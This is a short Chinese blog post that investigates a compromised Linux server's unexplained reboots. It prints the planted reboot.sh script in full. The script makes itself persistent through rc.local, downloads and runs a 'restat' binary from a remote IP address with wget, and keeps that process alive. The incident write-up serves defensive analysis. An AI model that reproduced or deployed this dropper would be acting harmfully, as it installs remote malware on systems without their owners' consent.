标签:linux入侵
现象:服务器无故重启。
查看原因:
# last | head -15 r00t tty1 Thu May 21 04:57 - 04:58 (00:00) reboot system boot 2.6.32-358.el6.x Thu May 21 04:56 - 04:58 (00:01) r00t tty1 Thu May 21 04:52 - down (00:03) r00t tty1 Thu May 21 04:42 - 04:52 (00:09)
被入侵,植入了reboot.sh脚本导致。
#!/bin/bash
if [ "sh /etc/reboot.sh &" = "$(cat /etc/rc.local | grep /etc/reboot.sh | grep -v grep)" ]; then
echo ""
else
echo "sh /etc/reboot.sh &" >> /etc/rc.local
fi
while [ 1 ]; do
restat_killn=$(ps aux | grep "/etc/restat" | grep -v grep | wc -l)
if [[ $restat_killn -eq 0 ]]; then
if [ ! -f "/etc/restat" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://115.230.127.95:523/restat
./wget -P /etc/ http://115.230.127.95:523/restat &> /dev/null
chmod 777 /etc/restat
rm wget -rf
else
echo "No wget"
fi
fi
/etc/restat &
#./restat &
elif [[ $restat_killn -gt 1 ]]; then
for killed in $(ps aux | grep "restat" | grep -v grep | awk ‘{print $2}‘); do
restat_killn=$(($restat_killn-1))
if [[ $restat_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
sleep 60
done本文出自 “传奇库子” 博客,请务必保留此出处http://chason.blog.51cto.com/9078447/1653911
标签:linux入侵
原文地址:http://chason.blog.51cto.com/9078447/1653911
